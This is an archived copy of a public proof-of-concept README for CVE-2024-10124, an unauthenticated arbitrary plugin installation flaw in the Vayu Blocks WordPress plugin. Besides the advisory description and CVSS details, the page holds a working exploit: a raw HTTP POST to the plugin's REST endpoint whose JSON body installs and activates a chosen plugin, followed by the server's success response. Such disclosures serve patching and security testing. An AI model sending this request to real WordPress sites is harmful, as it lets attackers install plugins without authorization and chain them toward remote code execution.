Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10124 PoC — Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary

Source
https://github.com/RandomRobbieBF/CVE-2024-10124
Associated Vulnerability
Title:Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation (CVE-2024-10124)
Description:The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.
Description
Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation
Readme
# CVE-2024-10124
Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation

# Description

The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.

## Details

- **Type**: plugin
- **Slug**: vayu-blocks
- **Affected Version**: 1.1.1
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-10124
- **Status**: Active

POC
---

```
POST /wp-json/ai/v1/vayu-site-builder HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 347


{
    "params": {
        "plugin": {
            "akismet": "Akismet Anti-Spam"
        },
        "allPlugins": [
            {
                "akismet": "akismet/akismet.php"
            }
        ],
        "themeSlug": "",
        "proThemePlugin": "",
        "templateType": "free",
        "tmplFreePro": "plugin"
    }
}
```

Should return your site url.

```
HTTP/2 200 OK
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: POST
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=UTF-8
Date: Thu, 12 Dec 2024 15:12:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <https://wp-dev.ddev.site/wp-json/>; rel="https://api.w.org/"
Pragma: no-cache
Server: nginx
Set-Cookie: PHPSESSID=95f3c834be0cac72019468ca39e71fa9; path=/
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex

"\"https:\\\/\\\/wp-dev.ddev.site\""
```
File Snapshot

 [4.0K]  /data/pocs/cf2bd8622920b625857fd7c2ae3284c2b50d4706
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →